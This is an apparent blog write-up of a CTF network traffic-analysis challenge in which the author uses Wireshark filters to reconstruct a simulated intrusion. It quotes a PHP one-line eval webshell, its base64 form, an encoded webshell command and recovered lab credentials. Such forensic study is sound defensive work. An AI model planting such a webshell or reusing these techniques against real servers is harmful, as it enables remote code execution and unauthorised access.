<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <link rel="stylesheet" href="/css/jquery.fancybox.min.css" media="all">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="题目2019.8 安恒流量分析 某公司内网网络被黑客渗透，请分析流量，给出黑客使用的扫描器 某公司内网网络被黑客渗透，请分析流量，得到黑客扫描到的登陆后台是(相对路径即可) 某公司内网网络被黑客渗透，请分析流量，得到黑客使用了什么账号密码登陆了web后台(形式:username&#x2F;password) 某公司内网网络被黑客渗透，请分析流量，得到黑客上传的webshell文件名是，内容是什么,提交web">
<meta property="og:type" content="article">
<meta property="og:title" content="comprehensive traffic analysis">
<meta property="og:url" content="https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/index.html">
<meta property="og:site_name" content="Polo&#39;s Blog">
<meta property="og:description" content="题目2019.8 安恒流量分析 某公司内网网络被黑客渗透，请分析流量，给出黑客使用的扫描器 某公司内网网络被黑客渗透，请分析流量，得到黑客扫描到的登陆后台是(相对路径即可) 某公司内网网络被黑客渗透，请分析流量，得到黑客使用了什么账号密码登陆了web后台(形式:username&#x2F;password) 某公司内网网络被黑客渗透，请分析流量，得到黑客上传的webshell文件名是，内容是什么,提交web">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-11-30T07:58:16.000Z">
<meta property="article:modified_time" content="2020-11-30T07:59:52.327Z">
<meta property="article:author" content="Polo">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>comprehensive traffic analysis</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post " href="/2020/12/03/vulstack-%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0-%E4%B8%80-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post " href="/2020/11/26/%E5%AE%89%E6%B4%B5%E6%9D%AFmisc%E5%85%A8wp/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&text=comprehensive traffic analysis"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&is_video=false&description=comprehensive traffic analysis"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=comprehensive traffic analysis&body=Check out this article: https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&name=comprehensive traffic analysis&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&t=comprehensive traffic analysis"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-number">1.</span> <span class="toc-text">题目</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#2019-8-%E5%AE%89%E6%81%92%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90"><span class="toc-number">1.1.</span> <span class="toc-text">2019.8 安恒流量分析</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">题目分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">3.</span> <span class="toc-text">总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BE%85%E5%AD%A6%E4%B9%A0%EF%BC%9APPTP%E5%8D%8F%E8%AE%AE%E3%80%81SMB%E5%8D%8F%E8%AE%AE"><span class="toc-number">3.1.</span> <span class="toc-text">待学习：PPTP协议、SMB协议</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">3.2.</span> <span class="toc-text">参考</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        comprehensive traffic analysis
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Polo</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-11-30T07:58:16.000Z" itemprop="datePublished">2020-11-30</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h1><h2 id="2019-8-安恒流量分析"><a href="#2019-8-安恒流量分析" class="headerlink" title="2019.8 安恒流量分析"></a>2019.8 安恒流量分析</h2><ol>
<li>某公司内网网络被黑客渗透，请分析流量，给出黑客使用的扫描器</li>
<li>某公司内网网络被黑客渗透，请分析流量，得到黑客扫描到的登陆后台是(相对路径即可)</li>
<li>某公司内网网络被黑客渗透，请分析流量，得到黑客使用了什么账号密码登陆了web后台(形式:username/password)</li>
<li>某公司内网网络被黑客渗透，请分析流量，得到黑客上传的webshell文件名是，内容是什么,提交webshell内容的base编码</li>
<li>某公司内网网络被黑客渗透，请分析流量，黑客在robots.txt中找到的flag是什么</li>
<li>某公司内网网络被黑客渗透，请分析流量，黑客找到的数据库密码是多少</li>
<li>某公司内网网络被黑客渗透，请分析流量，黑客在数据库中找到的hash_code是什么</li>
<li>某公司内网网络被黑客渗透，请分析流量，黑客破解了账号<a href="mailto:&#x69;&#106;&#x6e;&#117;&#x40;&#x74;&#101;&#x73;&#116;&#46;&#99;&#x6f;&#x6d;">&#x69;&#106;&#x6e;&#117;&#x40;&#x74;&#101;&#x73;&#116;&#46;&#99;&#x6f;&#x6d;</a>得到的密码是什么</li>
<li>某公司内网网络被黑客渗透，请分析流量，被黑客攻击的web服务器，网卡配置是是什么，提交网卡内网ip</li>
<li>某公司内网网络被黑客渗透，请分析流量，黑客使用了什么账号登陆了mail系统（形式: username/password）</li>
<li>某公司内网网络被黑客渗透，请分析流量，黑客获得的vpn的ip是少</li>
</ol>
<h1 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h1><p>1.观察12281号包，看HTTP层的referrer，发现了AWVS的扫描器特征。</p>
<p>2.过滤http协议，发现/admin/login.php</p>
<p>3.过滤http协议，看86号包，发现了表单数据 username 人事 password hr123456（错误答案）</p>
<p>302跳转代表登陆成功</p>
<p>使用http contains “rec=login” and http.request.method==POST and ip.src==192.168.94.59 语句对webone进行过滤，将结果对时间进行排序，发现最后一个包中的username admin password admin!@#pass123</p>
<p>4.a.php 翻到最后发现了a.php 然后分组列表搜a.php 找POST包</p>
<p> Form item: “action” = “QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJb</p>
<p>使用 http contains “&lt;?php @eval”  过滤找一句话木马，但是没找到。</p>
<p>考虑TCP 重传可能导致http没追踪到，所以考虑使用tcp contains “&lt;?php @eval”</p>
<p>发现了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="number">1234</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>将其base64encode即可。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PD9waHAgQGV2YWwoJF9QT1NUWzEyMzRdKTs&#x2F;Pg&#x3D;&#x3D;</span><br></pre></td></tr></table></figure>

<p>5.搜字符串robots.txt 发现flag flag:87b7cb79481f317bde90c116cf36084b</p>
<p>6.找到webshell的名称后，一直跟踪webshell，看看她在做什么。数据包大概在734581。</p>
<p>后面会发现查看了数据库配置文件，就发现了数据库账号密码 dbuser web dbpass e667jUPvJjXHvEUv</p>
<p>7.在web2数据包中 过滤mysql协议 分组字节流搜索字符串hash_code 看response包发现hash_code d1c029893df40cb0f47bcf8f1c3c17ac</p>
<p>8.web2数据包中 过滤mysql协议 搜索字符串 <a href="mailto:&#x69;&#x6a;&#x6e;&#117;&#64;&#116;&#101;&#x73;&#116;&#x2e;&#99;&#111;&#x6d;">&#x69;&#x6a;&#x6e;&#117;&#64;&#116;&#101;&#x73;&#116;&#x2e;&#99;&#111;&#x6d;</a> ，看到md5加密的密码b78f5aa6e1606f07def6e839121a22ec，解密一下得到edc123!@#</p>
<p>9.追踪webshell包，发现了ifconfig命令。</p>
<p> -&gt;|eth0      Link encap:Ethernet  HWaddr 00:0C:29:CB:9F:85  \n</p>
<p>​          inet addr:192.168.32.189  Bcast:192.168.32.255  Mask:255.255.255.0\n</p>
<p>10.打开mailtwo数据包，过滤http流，发现第一个数据包里面的动作是登出，发现了用户名wenwenni。</p>
<p>然后看28号数据包的操作是访问登录页面，35号数据包发现了密码加密函数。</p>
<p>是AES-CBC加密，key为1234567812345678。</p>
<p>继续看42 44数据包，还是wenwenni用户登录，并且返回了 success true.</p>
<p>尝试使用如下过滤器过滤:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(http contains &quot;&#123;\&quot;success\&quot;:true&#125;&quot; or http.request.method&#x3D;&#x3D;&quot;POST&quot;) and ip.addr&#x3D;&#x3D;192.168.94.59</span><br></pre></td></tr></table></figure>

<p>发现到最后也没爆破成功（这题看的别人的思路，我没懂）</p>
<p>然后打开mailto1 继续使用上述语句过滤</p>
<p>发现18512登陆成功，则密码在17126号数据包中。+ZgE14UGcFcyRGLI0/ZXPQ==</p>
<p>密码为1234567812345678的MD5值，偏移量为1234567812345678</p>
<p>AES解密得admin!@#PASS123</p>
<p>11.第一个vpn数据包在尝试登录vpn，然后看第二个。</p>
<p>统计一下会话信息，发现10.3.4.3 10.3.4.96 10.3.4.55 这几个ip之间的通信较多，然后过滤看看。</p>
<p>过滤一下smb协议，发现10.3.4.96是SMB服务器。</p>
<p>然后在看一下55这个ip</p>
<p> ip.addr==10.3.4.55  </p>
<p>发现10.3.4.3首先ping了10.3.4.55 所以确定10.3.4.3是黑客使用的vpn服务器。</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>对一些有手就行的过滤方法用的还可以，但是深入一点就不太行了 对一些流量动作的分析不太到位，对filter的用法也不太熟悉，比如\表转义。继续学习！</p>
<h2 id="待学习：PPTP协议、SMB协议"><a href="#待学习：PPTP协议、SMB协议" class="headerlink" title="待学习：PPTP协议、SMB协议"></a>待学习：PPTP协议、SMB协议</h2><h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43431158/article/details/107176918">https://blog.csdn.net/qq_43431158/article/details/107176918</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-number">1.</span> <span class="toc-text">题目</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#2019-8-%E5%AE%89%E6%81%92%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90"><span class="toc-number">1.1.</span> <span class="toc-text">2019.8 安恒流量分析</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">题目分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">3.</span> <span class="toc-text">总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BE%85%E5%AD%A6%E4%B9%A0%EF%BC%9APPTP%E5%8D%8F%E8%AE%AE%E3%80%81SMB%E5%8D%8F%E8%AE%AE"><span class="toc-number">3.1.</span> <span class="toc-text">待学习：PPTP协议、SMB协议</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">3.2.</span> <span class="toc-text">参考</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&text=comprehensive traffic analysis"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&is_video=false&description=comprehensive traffic analysis"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=comprehensive traffic analysis&body=Check out this article: https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&title=comprehensive traffic analysis"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&name=comprehensive traffic analysis&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://polosec.github.io/2020/11/30/comprehensive-traffic-analysis/&t=comprehensive traffic analysis"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
    <link rel="stylesheet" href="/css/jquery.fancybox.min.css" media="all">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2021
    Polo
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </nav>
  </div>
  
<link rel="stylesheet" href="/css/jquery.fancybox.min.css" media="all">  
<!-- fancybox大图查看 需jq -->
<script src="https://cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script>
<script type="text/javascript" src="/js/jquery.fancybox.min.js"></script>
<script>
  $('[data-fancybox="images"]').fancybox({//可选
    thumbs : {
      autoStart : true //缩略图
    }
  });
  $('[data-fancybox]').fancybox({//启用函数，必须
    //protect: true //图片右键不能下载，可选
  });
</script>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
